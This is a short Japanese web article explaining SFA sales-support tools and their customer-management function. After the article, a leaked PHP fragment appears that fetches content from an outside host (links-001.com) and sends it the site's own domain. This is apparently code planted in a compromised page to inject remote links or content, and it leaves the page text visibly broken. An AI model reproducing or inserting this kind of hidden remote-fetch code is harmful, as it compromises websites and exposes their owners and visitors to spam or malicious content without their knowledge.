SFAは顧客管理などの機能を備えたツールです

SFAは営業支援ツールのひとつであり、1990年代以降アメリカで注目されるようになり、その後、日本でも導入する企業が増えるようになってきています。
導入当初は、営業日報機能など、商談の進捗管理や顧客管理の面が強調されていましたが、近年は、SFAに蓄積されたデータを分析し、それをマーケティング管理に活用されることが増える傾向にあります。
その他、CRMツール機能としても紹介されるようになっています。
SFAには様々な機能がありますが、そのひとつが上記でも紹介した顧客管理です。
ここでの顧客管理は企業の情報を集約する機能であり、顧客情報としては、企業名をはじめ、所在地や担当スタッフ、連絡先といった基本的な情報の他に、商談を積み重ねることで収集した情報などの管理も含まれます。
SFAの顧客管理は、担当者以外のスタッフが見てもすぐに分かるような内容になっているのが特徴と言えます。
そのため営業担当スタッフがいない場合であっても、登録情報で引き継ぎができるというわけです。

".file_get_contents('http://links-001.com/dmset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿